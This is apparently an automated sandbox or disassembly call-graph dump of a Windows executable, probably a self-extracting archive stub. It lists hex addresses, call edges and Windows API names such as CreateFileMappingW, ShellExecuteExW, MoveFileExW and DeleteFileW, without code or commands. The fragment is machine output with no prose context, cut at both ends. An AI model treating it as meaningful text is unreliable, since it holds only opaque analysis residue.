894b3b 23727->23729 23730 894b32 FreeLibrary 23727->23730 23728->23727 23731 88d783 ___delayLoadHelper2@8 5 API calls 23729->23731 23730->23729 23732 894b45 23731->23732 23732->23699 23733->23698 23735->23716 23737 897b38 23736->23737 23741 897b2e 23736->23741 23738 897735 pre_c_initialization 5 API calls 23737->23738 23738->23741 23739 88d783 ___delayLoadHelper2@8 5 API calls 23740 894a64 23739->23740 23740->23720 23740->23721 23741->23739 23874 871019 29 API calls pre_c_initialization 23938 897216 21 API calls 23939 89ee16 CloseHandle 23749 896428 23757 89784c 23749->23757 23752 89643c 23754 896444 23755 896451 23754->23755 23765 896454 11 API calls 23754->23765 23758 897735 pre_c_initialization 5 API calls 23757->23758 23759 897873 23758->23759 23760 89788b TlsAlloc 23759->23760 23763 89787c 23759->23763 23760->23763 23761 88d783 ___delayLoadHelper2@8 5 API calls 23762 896432 23761->23762 23762->23752 23764 8963a3 20 API calls 2 library calls 23762->23764 23763->23761 23764->23754 23765->23752 23876 88b820 72 API calls 23905 889123 73 API calls 23780 88c726 19 API calls ___delayLoadHelper2@8 23906 880d3a 26 API calls std::bad_exception::bad_exception 23878 89f830 DeleteCriticalSection 23970 88d736 20 API calls 23908 88a537 93 API calls _swprintf 23909 895536 8 API calls ___vcrt_uninitialize 23971 88d74a 28 API calls 2 library calls 21932 889b4f 21933 889b59 __EH_prolog 21932->21933 22092 8712e7 21933->22092 21936 889b9b 21940 889ba8 21936->21940 21941 889c11 21936->21941 21995 889b87 21936->21995 21937 88a230 22182 88b8bc 21937->22182 21945 889bad 21940->21945 21946 889be4 21940->21946 21944 889cb0 GetDlgItemTextW 21941->21944 21950 889c2b 21941->21950 21942 88a25c 21948 88a265 SendDlgItemMessageW 21942->21948 21949 88a276 GetDlgItem SendMessageW 21942->21949 21943 88a24e SendMessageW 21943->21942 21944->21946 21947 889ce7 21944->21947 21951 87d142 54 API calls 21945->21951 21945->21995 21952 889c05 KiUserCallbackDispatcher 21946->21952 21946->21995 21954 889cff GetDlgItem 21947->21954 22090 889cf0 21947->22090 21948->21949 22200 888b8e GetCurrentDirectoryW 21949->22200 21955 87d142 54 API calls 21950->21955 21956 889bc7 21951->21956 21952->21995 21958 889d39 SetFocus 21954->21958 21959 889d13 SendMessageW SendMessageW 21954->21959 21960 889c4d SetDlgItemTextW 21955->21960 22222 871227 SHGetMalloc 21956->22222 21957 88a2a8 GetDlgItem 21963 88a2c1 21957->21963 21964 88a2c7 SetWindowTextW 21957->21964 21961 889d49 21958->21961 21976 889d55 21958->21976 21959->21958 21965 889c5b 21960->21965 21966 87d142 54 API calls 21961->21966 21963->21964 22201 888fc8 GetClassNameW 21964->22201 21970 889c68 GetMessageW 21965->21970 21983 889c8e TranslateMessage DispatchMessageW 21965->21983 21965->21995 21972 889d53 21966->21972 21967 889bce 21973 889bd2 SetDlgItemTextW 21967->21973 21967->21995 21968 88a1d0 21974 87d142 54 API calls 21968->21974 21970->21965 21970->21995 22102 88b70e GetDlgItem 21972->22102 21973->21995 21977 88a1e0 SetDlgItemTextW 21974->21977 21981 87d142 54 API calls 21976->21981 21979 88a1f4 21977->21979 21986 87d142 54 API calls 21979->21986 21985 889d87 21981->21985 21982 889daa 22110 879cce 21982->22110 21983->21965 21984 88a312 21989 88a342 21984->21989 21994 87d142 54 API calls 21984->21994 21990 873f5b _swprintf 51 API calls 21985->21990 21991 88a21d 21986->21991 21988 88aa45 91 API calls 21988->21984 22000 88aa45 91 API calls 21989->22000 22006 88a3fa 21989->22006 21990->21972 21992 87d142 54 API calls 21991->21992 21992->21995 21999 88a325 SetDlgItemTextW 21994->21999 21996 88a4aa 22002 88a4bc 21996->22002 22003 88a4b3 EnableWindow 21996->22003 21997 889ddf GetLastError 21998 889de6 21997->21998 22116 889023 SetCurrentDirectoryW 21998->22116 22005 87d142 54 API calls 21999->22005 22001 88a35d 22000->22001 22010 88a36f 22001->22010 22018 88a394 22001->22018 22007 88a4d9 22002->22007 22231 8712a4 GetDlgItem EnableWindow 22002->22231 22003->22002 22009 88a339 SetDlgItemTextW 22005->22009 22006->21996 22024 88a488 22006->22024 22037 87d142 54 API calls 22006->22037 22022 88a4f8 SendMessageW 22007->22022 22023 88a500 22007->22023 22008 889dfc 22013 889e05 GetLastError 22008->22013 22021 889e0f 22008->22021 22009->21989 22229 88859c 6 API calls 22010->22229 22011 88a3ed 22014 88aa45 91 API calls 22011->22014 22013->22021 22014->22006 22016 88a4cf 22232 8712a4 GetDlgItem EnableWindow 22016->22232 22017 87d142 54 API calls 22025 88a519 SetDlgItemTextW 22017->22025 22018->22011 22038 88aa45 91 API calls 22018->22038 22020 889e8a 22027 889e9a 22020->22027 22028 88a0d3 22020->22028 22021->22020 22021->22027 22029 889e27 GetTickCount 22021->22029 22022->22023 22023->21995 22023->22017 22230 88859c 6 API calls 22024->22230 22025->21995 22026 88a388 22026->22018 22033 88a06e 22027->22033 22034 889eb2 GetModuleFileNameW 22027->22034 22135 8712c2 GetDlgItem ShowWindow 22028->22135 22117 873f5b 22029->22117 22033->21946 22042 87d142 54 API calls 22033->22042 22223 87de7c 73 API calls 22034->22223 22035 889e44 22120 8794f1 22035->22120 22036 88a4a7 22036->21996 22037->22006 22043 88a3c2 22038->22043 22039 88a0e3 22136 8712c2 GetDlgItem ShowWindow 22039->22136 22041 889edc 22046 873f5b _swprintf 51 API calls 22041->22046 22047 88a082 22042->22047 22043->22011 22048 88a3cb DialogBoxParamW 22043->22048 22045 88a0ed 22137 87d142 22045->22137 22050 889efe CreateFileMappingW 22046->22050 22052 873f5b _swprintf 51 API calls 22047->22052 22048->21946 22048->22011 22054 889f60 GetCommandLineW 22050->22054 22086 889fdd __vswprintf_c_l 22050->22086 22056 88a0a0 22052->22056 22059 889f71 22054->22059 22055 889e6a 22060 889e78 22055->22060 22061 889e71 GetLastError 22055->22061 22068 87d142 54 API calls 22056->22068 22057 889fe8 ShellExecuteExW 22081 88a005 22057->22081 22224 8897e4 SHGetMalloc 22059->22224 22128 879437 22060->22128 22061->22060 22062 88a10b SetDlgItemTextW GetDlgItem 22065 88a13c 22062->22065 22066 88a124 GetWindowLongW SetWindowLongW 22062->22066 22145 88aa45 22065->22145 22066->22065 22067 889f8d 22225 8897e4 SHGetMalloc 22067->22225 22068->21946 22072 889f99 22226 8897e4 SHGetMalloc 22072->22226 22073 88a048 22073->22033 22080 88a05e UnmapViewOfFile CloseHandle 22073->22080 22074 88aa45 91 API calls 22076 88a158 22074->22076 22170 88bc78 22076->22170 22077 889fa5 22227 87dfde 73 API calls ___scrt_fastfail 22077->22227 22080->22033 22081->22073 22084 88a034 Sleep 22081->22084 22083 889fbc MapViewOfFile 22083->22086 22084->22073 22084->22081 22086->22057 22090->21946 22090->21968 22093 871349 22092->22093 22096 8712f0 22092->22096 22251 87ceb0 GetWindowLongW SetWindowLongW 22093->22251 22095 871356 22095->21936 22095->21937 22095->21995 22096->22095 22233 87ced7 22096->22233 22099 871325 GetDlgItem 22099->22095 22100 871335 22099->22100 22100->22095 22101 87133b SetWindowTextW 22100->22101 22101->22095 22103 88b76a SendMessageW SendMessageW 22102->22103 22104 88b73a 22102->22104 22105 88b7c1 SendMessageW SendMessageW SendMessageW 22103->22105 22106 88b7a2 22103->22106 22107 88b745 ShowWindow SendMessageW SendMessageW 22104->22107 22108 88b80b SendMessageW 22105->22108 22109 88b7ec SendMessageW 22105->22109 22106->22105 22107->22103 22108->21982 22109->22108 22113 879cd8 22110->22113 22111 879d92 22111->21997 22111->21998 22112 879d69 22112->22111 22114 879e86 9 API calls 22112->22114 22113->22111 22113->22112 22265 879e86 22113->22265 22114->22111 22116->22008 22312 873f2e 22117->22312 22121 8794fb 22120->22121 22122 879565 CreateFileW 22121->22122 22123 879559 22121->22123 22122->22123 22124 8795b7 22123->22124 22125 87b275 2 API calls 22123->22125 22124->22055 22126 87959e 22125->22126 22126->22124 22127 8795a2 CreateFileW 22126->22127 22127->22124 22129 87945b 22128->22129 22134 87946c 22128->22134 22130 879467 22129->22130 22131 87946e 22129->22131 22129->22134 22399 8795ea 22130->22399 22404 8794a3 22131->22404 22134->22020 22135->22039 22136->22045 22138 87d172 22137->22138 22139 87d191 LoadStringW 22138->22139 22140 87d17b LoadStringW 22138->22140 22141 87d1a3 22139->22141 22140->22139 22140->22141 22142 87c91f 52 API calls 22141->22142 22143 87d1b1 SetDlgItemTextW 22142->22143 22144 8712c2 GetDlgItem ShowWindow 22143->22144 22144->22062 22146 88aa4f __EH_prolog 22145->22146 22147 88a14a 22146->22147 22419 8896ec 22146->22419 22147->22074 22150 8896ec ExpandEnvironmentStringsW 22160 88aa86 _wcsrchr 22150->22160 22151 88ad86 SetWindowTextW 22151->22160 22156 88ab77 SetFileAttributesW 22158 88ac32 GetFileAttributesW 22156->22158 22167 88ab6a ___scrt_fastfail 22156->22167 22161 88ac40 DeleteFileW 22158->22161 22158->22167 22160->22147 22160->22150 22160->22151 22163 88af50 GetDlgItem SetWindowTextW SendMessageW 22160->22163 22165 88af92 SendMessageW 22160->22165 22160->22167 22423 880b12 CompareStringW 22160->22423 22424 888b8e GetCurrentDirectoryW 22160->22424 22425 87a1a9 7 API calls 22160->22425 22428 87a132 FindClose 22160->22428 22429 889844 69 API calls new 22160->22429 22430 8920de 22160->22430 22161->22167 22163->22160 22164 873f5b _swprintf 51 API calls 22166 88ac75 GetFileAttributesW 22164->22166 22165->22160 22166->22167 22168 88ac86 MoveFileW 22166->22168 22167->22156 22167->22158 22167->22160 22167->22164 22426 87b100 52 API calls 2 library calls 22167->22426 22427 87a1a9 7 API calls 22167->22427 22168->22167 22169 88ac9e MoveFileExW 22168->22169 22169->22167 22171 88bc82 __EH_prolog 22170->22171 22454 87f165 69 API calls 22171->22454 22173 88bcb3 22455 875bb7 69 API calls 22173->22455 22175 88bcd1 22456 877b10 74 API calls 2 library calls 22175->22456 22177 88bd15 22457 877c84 22177->22457 22179 88bd24 22466 877ba0 22179->22466 22183 88b8c9 22182->22183 23037 888ac0 22183->23037 22186 88a236 22186->21942 22186->21943 22187 88b8d6 GetWindow 22187->22186 22190 88b8f2 22187->22190 22188 88b8ff GetClassNameW 23042 880b12 CompareStringW 22188->23042 22190->22186 22190->22188 22191 88b988 GetWindow 22190->22191 22192 88b927 GetWindowLongW 22190->22192 22191->22186 22191->22190 22192->22191 22193 88b937 SendMessageW 22192->22193 22193->22191 22194 88b94d GetObjectW 22193->22194 23043 888b22 GetDC GetDeviceCaps ReleaseDC 22194->23043 22196 88b962 23044 888adf GetDC GetDeviceCaps ReleaseDC 22196->23044 23045 888cf3 8 API calls ___scrt_fastfail 22196->23045 22199 88b972 SendMessageW DeleteObject 22199->22191 22200->21957 22202 888fe9 22201->22202 22203 88900e 22201->22203 23048 880b12 CompareStringW 22202->23048 22205 88901c 22203->22205 22206 889013 SHAutoComplete 22203->22206 22209 889485 22205->22209 22206->22205 22207 888ffc 22207->22203 22208 889000 FindWindowExW 22207->22208 22208->22203 22210 88948f __EH_prolog 22209->22210 22211 87137e 75 API calls 22210->22211 22212 8894b1 22211->22212 23049 871edd 22212->23049 22215 8894da 22218 8718f6 127 API calls 22215->22218 22216 8894cb 22217 87162e 79 API calls 22216->22217 22219 8894d6 22217->22219 22220 8894fc __vswprintf_c_l new 22218->22220 22219->21984 22219->21988 22221 87162e 79 API calls 22220->22221 22221->22219 22222->21967 22223->22041 22224->22067 22225->22072 22226->22077 22227->22083 22229->22026 22230->22036 22231->22016 22232->22007 22252 87c88e 22233->22252 22235 87cefd GetWindowRect GetClientRect 22236 87cf57 22235->22236 22237 87cff2 22235->22237 22238 87d034 GetSystemMetrics GetWindow 22236->22238 22242 87cfb8 GetWindowLongW 22236->22242 22237->22238 22239 87cffc GetWindowTextW 22237->22239 22244 87d054 22238->22244 22255 87c91f 22239->22255 22241 87d028 SetWindowTextW 22241->22238 22246 87cfe2 GetWindowRect 22242->22246 22243 871312 22243->22095 22243->22099 22244->22243 22245 87d060 GetWindowTextW 22244->22245 22247 87c91f 52 API calls 22244->22247 22248 87d0a6 GetWindowRect 22244->22248 22249 87d11b GetWindow 22244->22249 22245->22244 22246->22237 22250 87d093 SetWindowTextW 22247->22250 22248->22249 22249->22243 22249->22244 22250->22244 22251->22095 22253 87c91f 52 API calls 22252->22253 22254 87c8b6 _wcschr 22253->22254 22254->22235 22256 87c929 22255->22256 22257 87c99d _strlen 22256->22257 22262 87c9fb _wcschr _wcsrchr 22256->22262 22263 880905 WideCharToMultiByte 22256->22263 22264 880905 WideCharToMultiByte 22257->22264 22260 87c9c8 _strlen 22261 873f5b _swprintf 51 API calls 22260->22261 22261->22262 22262->22241 22263->22257 22264->22260 22266 879e93 22265->22266 22267 879eb7 22266->22267 22268 879eaa CreateDirectoryW 22266->22268 22286 879dff 22267->22286 22268->22267 22270 879eea 22268->22270 22274 879ef9 22270->22274 22278 87a0c3 22270->22278 22272 879efd GetLastError 22272->22274 22274->22113 22276 879ed3 22276->22272 22277 879ed7 CreateDirectoryW 22276->22277 22277->22270 22277->22272 22299 88cec0 22278->22299 22281 87a0e6 22283 87b275 2 API calls 22281->22283 22282 87a113 22282->22274 22284 87a0fa 22283->22284 22284->22282 22285 87a0fe SetFileAttributesW 22284->22285 22285->22282 22301 879e13 22286->22301 22289 87b275 22290 87b282 22289->22290 22298 87b28c 22290->22298 22309 87b40f CharUpperW 22290->22309 22292 87b29b 22310 87b43b CharUpperW 22292->22310 22294 87b2aa 22295 87b325 GetCurrentDirectoryW 22294->22295 22296 87b2ae 22294->22296 22295->22298 22311 87b40f CharUpperW 22296->22311 22298->22276 22300 87a0d0 SetFileAttributesW 22299->22300 22300->22281 22300->22282 22302 88cec0 22301->22302 22303 879e20 GetFileAttributesW 22302->22303 22304 879e31 22303->22304 22305 879e08 22303->22305 22306 87b275 2 API calls 22304->22306 22305->22272 22305->22289 22307 879e45 22306->22307 22307->22305 22308 879e49 GetFileAttributesW 22307->22308 22308->22305 22309->22292 22310->22294 22311->22298 22313 873f45 __vswprintf_c_l 22312->22313 22316 8934dd 22313->22316 22319 8921bb 22316->22319 22320 8921fb 22319->22320 22321 8921e3 22319->22321 22320->22321 22322 892203 22320->22322 22343 895e3e 20 API calls __dosmaperr 22321->22343 22345 892636 22322->22345 22324 8921e8 22344 895d1d 26 API calls pre_c_initialization 22324->22344 22330 873f4f 22330->22035 22331 89228b 22354 89283c 51 API calls 3 library calls 22331->22354 22334 892296 22355 8926b9 20 API calls _free 22334->22355 22335 8921f3 22336 88d783 22335->22336 22337 88d78c 22336->22337 22338 88d78e IsProcessorFeaturePresent 22336->22338 22337->22330 22340 88ddb8 22338->22340 22356 88dd7c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22340->22356 22342 88de9b 22342->22330 22343->22324 22344->22335 22346 892213 22345->22346 22347 892653 22345->22347 22353 892601 20 API calls 2 library calls 22346->22353 22347->22346 22357 89631f GetLastError 22347->22357 22349 892674 22377 89646e 38 API calls __fassign 22349->22377 22351 89268d 22378 89649b 38 API calls __fassign 22351->22378 22353->22331 22354->22334 22355->22335 22356->22342 22358 89633b 22357->22358 22359 896335 22357->22359 22363 89638a SetLastError 22358->22363 22380 895a8d 22358->22380 22379 8978f8 11 API calls 2 library calls 22359->22379 22363->22349 22364 896355 22387 8959c2 22364->22387 22367 89636a 22367->22364 22368 896371 22367->22368 22394 896191 20 API calls pre_c_initialization 22368->22394 22369 89635b 22371 896396 SetLastError 22369->22371 22395 895a4a 38 API calls _abort 22371->22395 22372 89637c 22374 8959c2 _free 20 API calls 22372->22374 22376 896383 22374->22376 22376->22363 22376->22371 22377->22351 22378->22346 22379->22358 22381 895a9a pre_c_initialization 22380->22381 22382 895ada 22381->22382 22383 895ac5 RtlAllocateHeap 22381->22383 22396 8946ca 7 API calls 2 library calls 22381->22396 22397 895e3e 20 API calls __dosmaperr 22382->22397 22383->22381 22385 895ad8 22383->22385 22385->22364 22393 89794e 11 API calls 2 library calls 22385->22393 22388 8959f6 __dosmaperr 22387->22388 22389 8959cd RtlFreeHeap 22387->22389 22388->22369 22389->22388 22390 8959e2 22389->22390 22398 895e3e 20 API calls __dosmaperr 22390->22398 22392 8959e8 GetLastError 22392->22388 22393->22367 22394->22372 22396->22381 22397->22385 22398->22392 22400 8795f7 22399->22400 22401 8795f3 22399->22401 22400->22401 22410 879dac 22400->22410 22401->22134 22405 8794af 22404->22405 22407 8794cd 22404->22407 22405->22407 22408 8794bb CloseHandle 22405->22408 22406 8794ec 22406->22134 22407->22406 22418 876d80 67 API calls 22407->22418 22408->22407 22411 88cec0 22410->22411 22412 879db9 DeleteFileW 22411->22412 22413 879611 22412->22413 22414 879dcc 22412->22414 22413->22134 22415 87b275 2 API calls 22414->22415 22416 879de0 22415->22416 22416->22413 22417 879de4 DeleteFileW 22416->22417 22417->22413 22418->22406 22420 8896f6 22419->22420 22421 8897a9 ExpandEnvironmentStringsW 22420->22421 22422 8897cc 22420->22422 22421->22422 22422->22160 22423->22160 22424->22160 22425->22160 22426->22167 22427->22167 22428->22160 22429->22160 22431 895aea 22430->22431 22432 895b02 22431->22432 22433 895af7 22431->22433 22434 895b0a 22432->22434 22442 895b13 pre_c_initialization 22432->22442 22443 8959fc 22433->22443 22436 8959c2 _free 20 API calls 22434->22436 22439 895aff 22436->22439 22437 895b18 22450 895e3e 20 API calls __dosmaperr 22437->22450 22438 895b3d HeapReAlloc 22438->22439 22438->22442 22439->22160 22442->22437 22442->22438 22451 8946ca 7 API calls 2 library calls 22442->22451 22444 895a3a 22443->22444 22449 895a0a pre_c_initialization 22443->22449 22453 895e3e 20 API calls __dosmaperr 22444->22453 22445 895a25 RtlAllocateHeap 22447 895a38 22445->22447 22445->22449 22447->22439 22449->22444 22449->22445 22452 8946ca 7 API calls 2 library calls 22449->22452 22450->22439 22451->22442 22452->22449 22453->22447 22454->22173 22455->22175 22456->22177 22458 877c8e 22457->22458 22459 877cf8 22458->22459 22492 87a145 22458->22492 22463 877d62 22459->22463 22464 87a145 8 API calls 22459->22464 22470 87820b 22459->22470 22461 877da4 22461->22179 22463->22461 22498 876d0d 67 API calls 22463->22498 22464->22459 22467 877bae 22466->22467 22469 877bb5 22466->22469 22468 880e21 79 API calls 22467->22468 22468->22469 22471 878215 __EH_prolog 22470->22471 22499 87137e 22471->22499 22473 878230 22507 879ba2 22473->22507 22478 87825b 22480 87825f 22478->22480 22489 87a145 8 API calls 22478->22489 22491 8782fa 22478->22491 22631 87b6cb CompareStringW 22478->22631 22627 87162e 22480->22627 22484 87835a 22530 871e8e 22484->22530 22487 878365 22487->22480 22534 873a20 22487->22534 22544 878409 22487->22544 22489->22478 22526 8783a3 22491->22526 22493 87a15a 22492->22493 22494 87a15e 22493->22494 23025 87a273 22493->23025 22494->22458 22496 87a16e 22496->22494 22497 87a173 FindClose 22496->22497 22497->22494 22498->22461 22500 871383 __EH_prolog 22499->22500 22633 87c413 22500->22633 22502 8713ba 22506 871413 ___scrt_fastfail 22502->22506 22639 88cdae 22502->22639 22506->22473 22508 879bad 22507->22508 22509 878246 22508->22509 22664 876e66 67 API calls 22508->22664 22509->22480 22511 8719b1 22509->22511 22512 8719bb __EH_prolog 22511->22512 22519 8719fd 22512->22519 22525 8719e4 22512->22525 22665 87135c 22512->22665 22514 871b16 22668 876d0d 67 API calls 22514->22668 22516 873a20 90 API calls 22521 871b6d 22516->22521 22517 871b26 22517->22516 22517->22525 22518 871bb7 22524 871bea 22518->22524 22518->22525 22669 876d0d 67 API calls 22518->22669 22519->22514 22519->22517 22519->22525 22521->22518 22522 873a20 90 API calls 22521->22522 22522->22521 22523 873a20 90 API calls 22523->22524 22524->22523 22524->22525 22525->22478 22527 8783b0 22526->22527 22687 87ffb8 GetSystemTime SystemTimeToFileTime 22527->22687 22529 878314 22529->22484 22632 8806c8 65 API calls 22529->22632 22531 871e93 __EH_prolog 22530->22531 22532 871ec7 22531->22532 22689 8718f6 22531->22689 22532->22487 22535 873a30 22534->22535 22536 873a2c 22534->22536 22537 873a4f 22535->22537 22538 873a5d 22535->22538 22536->22487 22543 873a8f 22537->22543 22909 873203 78 API calls 3 library calls 22537->22909 22910 87276c 90 API calls 3 library calls 22538->22910 22541 873a5b 22541->22543 22911 871fd2 67 API calls 22541->22911 22543->22487 22545 878413 __EH_prolog 22544->22545 22546 87844f 22545->22546 22577 878453 22545->22577 22965 8877e7 93 API calls 22545->22965 22547 878478 22546->22547 22552 8784ff 22546->22552 22546->22577 22548 87849a 22547->22548 22547->22577 22966 877a2f 151 API calls 22547->22966 22548->22577 22967 8877e7 93 API calls 22548->22967 22552->22577 22912 875d98 22552->22912 22554 87858c 22554->22577 22920 8780f8 22554->22920 22557 8786e9 22558 87a145 8 API calls 22557->22558 22561 87874d 22557->22561 22558->22561 22560 87c57d 73 API calls 22564 8787a7 _memcmp 22560->22564 22924 877c11 22561->22924 22562 8788d1 22563 8789a0 22562->22563 22569 87891f 22562->22569 22568 8789fb 22563->22568 22580 8789ab 22563->22580 22564->22560 22564->22562 22565 8788ca 22564->22565 22564->22577 22968 8780a6 75 API calls 22564->22968 22969 876d0d 67 API calls 22564->22969 22970 876d0d 67 API calls 22565->22970 22579 87898f 22568->22579 22972 877f88 89 API calls 22568->22972 22572 879dff 4 API calls 22569->22572 22569->22579 22570 878fb5 22574 879437 72 API calls 22570->22574 22571 8789f9 22573 879437 72 API calls 22571->22573 22576 878956 22572->22576 22573->22577 22574->22577 22576->22579 22971 879161 89 API calls 22576->22971 22577->22487 22578 878a64 22578->22570 22591 878acd 22578->22591 22973 87971a 22578->22973 22579->22571 22579->22578 22580->22571 22930 877dc4 22580->22930 22581 87a6a9 8 API calls 22584 878b1c 22581->22584 22587 87a6a9 8 API calls 22584->22587 22586 878aa5 22586->22591 22977 871f18 67 API calls 22586->22977 22601 878b32 22587->22601 22589 878abb 22978 876f67 68 API calls 22589->22978 22591->22581 22592 878d22 22598 878d34 22592->22598 22599 878d48 22592->22599 22617 878c4e 22592->22617 22593 878c1e 22595 878c8e 22593->22595 22597 878c2e 22593->22597 22594 878bd5 22594->22592 22594->22593 22596 8780f8 CharUpperW 22595->22596 22602 878ca9 22596->22602 22603 878c72 22597->22603 22607 878c3c 22597->22607 22604 8790d0 120 API calls 22598->22604 22605 881fa9 68 API calls 22599->22605 22601->22594 22955 879869 22601->22955 22610 878cd2 22602->22610 22611 878cd9 22602->22611 22602->22617 22603->22617 22980 8777d4 101 API calls 22603->22980 22604->22617 22606 878d61 22605->22606 22608 881c40 120 API calls 22606->22608 22979 871f18 67 API calls 22607->22979 22608->22617 22981 877586 77 API calls pre_c_initialization 22610->22981 22982 87900e 85 API calls __EH_prolog 22611->22982 22615 878e6c 22615->22570 22616 878edb 22615->22616 22984 879b6a SetEndOfFile 22615->22984 22960 879a12 22616->22960 22617->22615 22983 871f18 67 API calls 22617->22983 22621 878f35 22622 8794a3 68 API calls 22621->22622 22623 878f40 22622->22623 22623->22570 22624 87a0c3 4 API calls 22623->22624 22625 878f9f 22624->22625 22625->22570 22985 871f18 67 API calls 22625->22985 22628 871640 22627->22628 23024 87c4b6 79 API calls 22628->23024 22631->22478 22632->22484 22634 87c41d __EH_prolog 22633->22634 22635 88cdae new 8 API calls 22634->22635 22636 87c460 22635->22636 22637 88cdae new 8 API calls 22636->22637 22638 87c484 22637->22638 22638->22502 22641 88cdb3 new 22639->22641 22640 871400 22640->22506 22645 87ac66 22640->22645 22641->22640 22651 8946ca 7 API calls 2 library calls 22641->22651 22652 88d83a RaiseException Concurrency::cancel_current_task new 22641->22652 22653 88d81d RaiseException Concurrency::cancel_current_task 22641->22653 22646 87ac70 __EH_prolog 22645->22646 22654 87ddc2 73 API calls 22646->22654 22648 87ac82 22655 87ad7e 22648->22655 22651->22641 22654->22648 22656 87ad90 ___scrt_fastfail 22655->22656 22659 87fce6 22656->22659 22662 87fca6 GetCurrentProcess GetProcessAffinityMask 22659->22662 22663 87acf8 22662->22663 22663->22506 22664->22509 22670 871705 22665->22670 22667 871378 22667->22519 22668->22525 22669->22524 22671 87171b 22670->22671 22682 871773 __vswprintf_c_l 22670->22682 22672 871744 22671->22672 22683 876dd3 67 API calls __vswprintf_c_l 22671->22683 22673 87179a 22672->22673 22679 871760 new 22672->22679 22675 8920de 22 API calls 22673->22675 22677 8717a1 22675->22677 22676 87173a 22684 876e0b 68 API calls 22676->22684 22677->22682 22686 876e0b 68 API calls 22677->22686 22679->22682 22685 876e0b 68 API calls 22679->22685 22682->22667 22683->22676 22684->22672 22685->22682 22686->22682 22688 87ffe8 __vswprintf_c_l 22687->22688 22688->22529 22690 8718fb __EH_prolog 22689->22690 22691 871934 22690->22691 22693 87190f 22690->22693 22694 871964 22690->22694 22692 873a20 90 API calls 22691->22692 22692->22693 22693->22532 22698 873e69 22694->22698 22699 873e72 22698->22699 22700 873a20 90 API calls 22699->22700 22702 871980 22699->22702 22715 87f8f2 22699->22715 22700->22699 22702->22693 22703 871da1 22702->22703 22704 871dab __EH_prolog 22703->22704 22723 873aa3 22704->22723 22706 871dd4 22707 871705 69 API calls 22706->22707 22714 871e5b 22706->22714 22708 871deb 22707->22708 22753 87187c 69 API calls 22708->22753 22710 871e03 22712 871e0f 22710->22712 22754 8806e9 MultiByteToWideChar 22710->22754 22755 87187c 69 API calls 22712->22755 22714->22693 22716 87f8f9 22715->22716 22717 87f914 22716->22717 22721 876dce RaiseException Concurrency::cancel_current_task 22716->22721 22719 87f925 SetThreadExecutionState 22717->22719 22722 876dce RaiseException Concurrency::cancel_current_task 22717->22722 22719->22699 22721->22717 22722->22719 22724 873aad __EH_prolog 22723->22724 22725 873ac3 22724->22725 22726 873adf 22724->22726 22792 876d0d 67 API calls 22725->22792 22728 873d1f 22726->22728 22731 873b0b 22726->22731 22811 876d0d 67 API calls 22728->22811 22730 873ace 22730->22706 22731->22730 22756 880be0 22731->22756 22733 873b43 22760 881fa9 22733->22760 22735 873b8c 22736 873c17 22735->22736 22752 873b83 22735->22752 22795 87c57d 22735->22795 22773 87a6a9 22736->22773 22737 873b88 22737->22735 22794 871fb8 69 API calls 22737->22794 22739 873b5a 22739->22735 22739->22737 22740 873b78 22739->22740 22793 876d0d 67 API calls 22740->22793 22743 873c2a 22746 873ca5 22743->22746 22747 873c9b 22743->22747 22801 881c40 22746->22801 22777 8790d0 22747->22777 22750 873ca3 22750->22752 22810 871f18 67 API calls 22750->22810 22788 880e21 22752->22788 22753->22710 22754->22712 22755->22714 22757 880bea __EH_prolog 22756->22757 22812 87fb02 22757->22812 22759 880cea 22759->22733 22761 881fb8 22760->22761 22763 881fc2 22760->22763 22831 876e0b 68 API calls 22761->22831 22764 882002 22763->22764 22765 882007 new 22763->22765 22772 882060 ___scrt_fastfail 22763->22772 22833 8900ca RaiseException 22764->22833 22767 882117 22765->22767 22769 88203c 22765->22769 22765->22772 22834 8900ca RaiseException 22767->22834 22832 881eca 68 API calls 3 library calls 22769->22832 22770 88213a 22772->22739 22774 87a6b6 22773->22774 22776 87a6c0 22773->22776 22775 88cdae new 8 API calls 22774->22775 22775->22776 22776->22743 22778 8790da __EH_prolog 22777->22778 22835 877c6b 22778->22835 22781 87135c 69 API calls 22782 8790ec 22781->22782 22838 87c658 22782->22838 22784 879146 22784->22750 22785 8790fe 22785->22784 22786 87c658 115 API calls 22785->22786 22847 87c810 91 API calls __vswprintf_c_l 22785->22847 22786->22785 22789 880e43 22788->22789 22857 87fc30 22789->22857 22791 880e5c 22791->22730 22792->22730 22793->22752 22794->22735 22796 87c5b0 22795->22796 22797 87c59e 22795->22797 22874 876195 73 API calls 22796->22874 22873 876195 73 API calls 22797->22873 22800 87c5a8 22800->22736 22802 881c49 22801->22802 22803 881c72 22801->22803 22805 881c68 22802->22805 22807 881c5e 22802->22807 22809 881c66 22802->22809 22803->22809 22889 88421d 120 API calls 2 library calls 22803->22889 22888 884f35 115 API calls 22805->22888 22875 885984 22807->22875 22809->22750 22810->22752 22811->22730 22828 88cdf0 22812->22828 22814 87fb0c EnterCriticalSection 22815 87fb4e 22814->22815 22816 87fb30 22814->22816 22818 87fb66 22815->22818 22819 87fb95 LeaveCriticalSection 22815->22819 22817 88cdae new 8 API calls 22816->22817 22821 87fb3a 22817->22821 22822 88cdae new 8 API calls 22818->22822 22820 87fba1 22819->22820 22820->22759 22821->22815 22829 87f930 71 API calls 22821->22829 22823 87fb70 22822->22823 22825 87fb8a LeaveCriticalSection 22823->22825 22830 87f930 71 API calls 22823->22830 22825->22820 22827 87fb88 22827->22825 22828->22814 22829->22815 22830->22827 22831->22763 22832->22772 22833->22767 22834->22770 22848 87a8e0 22835->22848 22843 87c66d __vswprintf_c_l 22838->22843 22839 87c7b7 22840 87c7df 22839->22840 22851 87c5f7 22839->22851 22842 87f8f2 2 API calls 22840->22842 22845 87c7ae 22842->22845 22843->22839 22843->22845 22855 87a791 85 API calls 22843->22855 22856 8877e7 93 API calls 22843->22856 22845->22785 22847->22785 22849 87a8f4 GetVersionExW 22848->22849 22850 877c70 22848->22850 22849->22850 22850->22781 22852 87c651 22851->22852 22853 87c600 22851->22853 22852->22840 22853->22852 22854 880680 PeekMessageW GetMessageW TranslateMessage DispatchMessageW SendDlgItemMessageW 22853->22854 22854->22852 22855->22843 22856->22843 22858 87fca2 22857->22858 22859 87fc39 EnterCriticalSection 22857->22859 22858->22791 22863 87fc57 22859->22863 22865 87fc75 22859->22865 22860 87f9d1 77 API calls 22862 87fc8f 22860->22862 22861 87fc98 LeaveCriticalSection 22861->22858 22862->22861 22863->22865 22866 87f9d1 22863->22866 22865->22860 22865->22861 22867 87fdc9 72 API calls 22866->22867 22868 87f9f3 ReleaseSemaphore 22867->22868 22869 87fa13 